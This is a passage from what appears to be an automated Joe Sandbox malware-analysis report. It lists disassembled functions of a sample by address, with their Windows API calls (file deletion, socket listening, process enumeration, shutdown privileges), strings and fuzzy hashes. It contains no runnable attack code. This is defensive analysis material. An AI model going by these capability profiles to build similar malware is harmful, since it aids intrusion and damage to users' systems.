                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: 3d3a8c198c470b4eaf827b2ef8f2d9666237158499589ef6c4947fb72201cdb1
                                                                                                                    • Instruction ID: 2dd1d4ca1eb6b9ce442a7db88bdf62297934714c94b2660c0458c818bbd6d3dd
                                                                                                                    • Opcode Fuzzy Hash: 3d3a8c198c470b4eaf827b2ef8f2d9666237158499589ef6c4947fb72201cdb1
                                                                                                                    • Instruction Fuzzy Hash: 73219F352006109FDB16AF64EC49F6A7BACFF06711F14842AF9469B2B1DB30AC02CB54
                                                                                                                    Function 003837EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                      • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003838A3
                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0038394B
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0038395E
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0038397B
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0038399D
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003839B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4002782344-1173974218
                                                                                                                    • Opcode ID: 1c92fb809e2d1cec3f0a91472ac156da5f0e1658b60ccf057a197dda5d0bd51e
                                                                                                                    • Instruction ID: 6d45537379bcb86ff7982d1179307849cb8ea7696347918e621f3915d8274a6d
                                                                                                                    • Opcode Fuzzy Hash: 1c92fb809e2d1cec3f0a91472ac156da5f0e1658b60ccf057a197dda5d0bd51e
                                                                                                                    • Instruction Fuzzy Hash: 6251833180525D9ACF17FBA0D9929EDB779AF15300F6040A9E446BB291EF316F0DCB51
                                                                                                                    Function 0038F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0038F440
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0038F470
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F484
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F49F
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0038F53D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F553
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 713712311-438819550
                                                                                                                    • Opcode ID: 7c3dea329133d7b543cc4cc1bab170df596440d7393b7016ebf234b65b412dda
                                                                                                                    • Instruction ID: 2fffaa1911bf036537db4f3d67aeecd6f6466e6bf498559dd9c3403e284186b4
                                                                                                                    • Opcode Fuzzy Hash: 7c3dea329133d7b543cc4cc1bab170df596440d7393b7016ebf234b65b412dda
                                                                                                                    • Instruction Fuzzy Hash: C34174719002199FCF16EFA4DC45AEEBBB8FF16310F1445AAE815A7191DB309E85CF90
                                                                                                                    Function 00333030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow__swprintf
                                                                                                                    • String ID: 3c3$_3
                                                                                                                    • API String ID: 674341424-176681986
                                                                                                                    • Opcode ID: a8ecce5de1d7ea7bda5989559db6dc0be1da4a39da207ffd49a77d89b1c0ec55
                                                                                                                    • Instruction ID: f086db7c44b077b0f01ed561e2785a3922bbc7b63ccd7948638d2b91310da387
                                                                                                                    • Opcode Fuzzy Hash: a8ecce5de1d7ea7bda5989559db6dc0be1da4a39da207ffd49a77d89b1c0ec55
                                                                                                                    • Instruction Fuzzy Hash: AD22AD716083109FC726DF24D881B6FB7E8BF84710F05892DF89A9B291DB71E944CB92
                                                                                                                    Function 00335760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: b8cb4eb2f6ef9bd81378c2da99fb2aebac522c3ff96d09f2904b3d74a63be14c
                                                                                                                    • Instruction ID: 8f143d14435be7d93914c0d84e48a395e3d34b86f955811b2c3bfc118c9a6d74
                                                                                                                    • Opcode Fuzzy Hash: b8cb4eb2f6ef9bd81378c2da99fb2aebac522c3ff96d09f2904b3d74a63be14c
                                                                                                                    • Instruction Fuzzy Hash: B8129070A00619EFDF1ADFA5D981AAEB7F5FF48300F108529E409EB250EB39AD54CB51
                                                                                                                    Function 00383B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                      • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00383B89
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00383BD9
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00383BEA
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00383C01
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00383C0A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: 4f4e9e8790ac929710297ba2c18bdc5fa3ae757b94371597718b401766f9aa6c
                                                                                                                    • Instruction ID: 550acd9c08ce11f25e000d529c62286136d7303ec280186cb9c3d7022b28de16
                                                                                                                    • Opcode Fuzzy Hash: 4f4e9e8790ac929710297ba2c18bdc5fa3ae757b94371597718b401766f9aa6c
                                                                                                                    • Instruction Fuzzy Hash: 32318D350083959FC303FF64E8919AFB7A8BE92314F404D6DF4D596291EB20DA08C7A2
                                                                                                                    Function 003851BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
                                                                                                                      • Part of subcall function 003787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
                                                                                                                      • Part of subcall function 003787E1: GetLastError.KERNEL32 ref: 00378865
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 003851F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                    • Opcode ID: 230fe8b64b281a89cc45bab0aa34d52708b86276691bd2934fa5d18657d11cc5
                                                                                                                    • Instruction ID: 376a4cb4cf39264c0f573accec4007e1c3bc2a299307f39bf9eab7e848750417
                                                                                                                    • Opcode Fuzzy Hash: 230fe8b64b281a89cc45bab0aa34d52708b86276691bd2934fa5d18657d11cc5
                                                                                                                    • Instruction Fuzzy Hash: 5F01F7356917156BEB2B7378AC8AFBA725CAB06740F210CA1F957E64D2DD515C008790
                                                                                                                    Function 00396283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003962DC
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003962EB
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00396307
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00396316
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00396330
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00396344
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279440585-0
                                                                                                                    • Opcode ID: cec9787baed75f72e2fa05ad9f151ce3e2e0c61ccc9d7fe58cc37bb78a7f875e
                                                                                                                    • Instruction ID: fa41ff0b7d0d038651115bc3c57a5da1978aea6ed3d8b75d785c3384d398e23d
                                                                                                                    • Opcode Fuzzy Hash: cec9787baed75f72e2fa05ad9f151ce3e2e0c61ccc9d7fe58cc37bb78a7f875e
                                                                                                                    • Instruction Fuzzy Hash: 7221D0356002109FCF12EF64D886B6EB7ADEF49720F158159E856AB3E1C770AC01CB51
                                                                                                                    Function 00335520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                    • _memmove.LIBCMT ref: 00370258
                                                                                                                    • _memmove.LIBCMT ref: 0037036D
                                                                                                                    • _memmove.LIBCMT ref: 00370414
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1300846289-0
                                                                                                                    • Opcode ID: d34487a5e63324b472d63b70fb145de3b0f7a45f9fcca905bbc373b126bd1cdc
                                                                                                                    • Instruction ID: 40ae6271ef81c7f834503f1dd24ae8d50c8172bb794df924afc4a39c3abe4863
                                                                                                                    • Opcode Fuzzy Hash: d34487a5e63324b472d63b70fb145de3b0f7a45f9fcca905bbc373b126bd1cdc
                                                                                                                    • Instruction Fuzzy Hash: D102BF70A00209DBDF1ADF64D981AAE7BF9EF44300F558069E80ADF255EB34E954CB91
                                                                                                                    Function 00321287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 003219FA
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00321A4E
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00321A61
                                                                                                                      • Part of subcall function 00321290: DefDlgProcW.USER32(?,00000020,?), ref: 003212D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3744519093-0
                                                                                                                    • Opcode ID: b58591d893670c0a8a728b8e19f871a653770b27885e2017f276da6fc4049535
                                                                                                                    • Instruction ID: ef1aa222edee3ffeb85ef04d0348ba6eb384ec9e8793e3f447e2d2f93cf63256
                                                                                                                    • Opcode Fuzzy Hash: b58591d893670c0a8a728b8e19f871a653770b27885e2017f276da6fc4049535
                                                                                                                    • Instruction Fuzzy Hash: C2A19B711125B4BEE73BAB28BE45EBF355CDF62342F160219F802D95E2CB228D0092F1
                                                                                                                    Function 00396747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00397D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00397DB6
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0039679E
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003967C7
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00396800
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0039680D
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00396821
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 99427753-0
                                                                                                                    • Opcode ID: e64571ba8f954900b787ad19dff08816fa01ccad00a88fc7bc09fb8786e658ca
                                                                                                                    • Instruction ID: f994c2ceee8b53eb3cec66e77fd32d247d42a2be2a2234491f42d35787f8245f
                                                                                                                    • Opcode Fuzzy Hash: e64571ba8f954900b787ad19dff08816fa01ccad00a88fc7bc09fb8786e658ca
                                                                                                                    • Instruction Fuzzy Hash: 6841B175A00220AFDB12AF649C87F6E77E8EF09754F448459F91AAF3D2CA749D008791
                                                                                                                    Function 003A5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: a046b2c49f643fcddcb51d60b0b6ff6f5db7f2deb02c5b7517468cc62bc8012b
                                                                                                                    • Instruction ID: 300328f3c16888fc4cc65bc233dcf70c2e7d685ae449248bea7f028db527d5d3
                                                                                                                    • Opcode Fuzzy Hash: a046b2c49f643fcddcb51d60b0b6ff6f5db7f2deb02c5b7517468cc62bc8012b
                                                                                                                    • Instruction Fuzzy Hash: 3511C4327009216FDB235F669C44B6EBB9CFF877A1F454429F846D7291CB70DC0186A0
                                                                                                                    Function 003780A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003780C0
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003780CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003780D9
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003780E0
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003780F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: f548bc9fa2a6177542a89286e0500554c65a1700e46e4a7e43d00232d8750dad
                                                                                                                    • Instruction ID: 1767f99d4bd47482d3117b3285fb4b3075c1d9e2e67a019dd323dd40a2cfc191
                                                                                                                    • Opcode Fuzzy Hash: f548bc9fa2a6177542a89286e0500554c65a1700e46e4a7e43d00232d8750dad
                                                                                                                    • Instruction Fuzzy Hash: E3F06235240208AFEB224FA5EC8DE673BACEF4A755F404025F949C6150CB65DC41DA60
                                                                                                                    Function 00324B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00324AD0), ref: 00324B45
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00324B57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 7d477ecd50130ab47e8c138a8defb089d2b223ec8a025bc2203b2b725992f2b0
                                                                                                                    • Instruction ID: 48350dacac03aecada456da4afc8555432a1911895bad8e3afaf339c9d14c29f
                                                                                                                    • Opcode Fuzzy Hash: 7d477ecd50130ab47e8c138a8defb089d2b223ec8a025bc2203b2b725992f2b0
                                                                                                                    • Instruction Fuzzy Hash: BDD01234A10723CFDB229FB1E858B4676E8AF06351F118839D4C6D6150D670D480CA64
                                                                                                                    Function 0039EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0039EE3D
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0039EE4B
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0039EF0B
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0039EF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
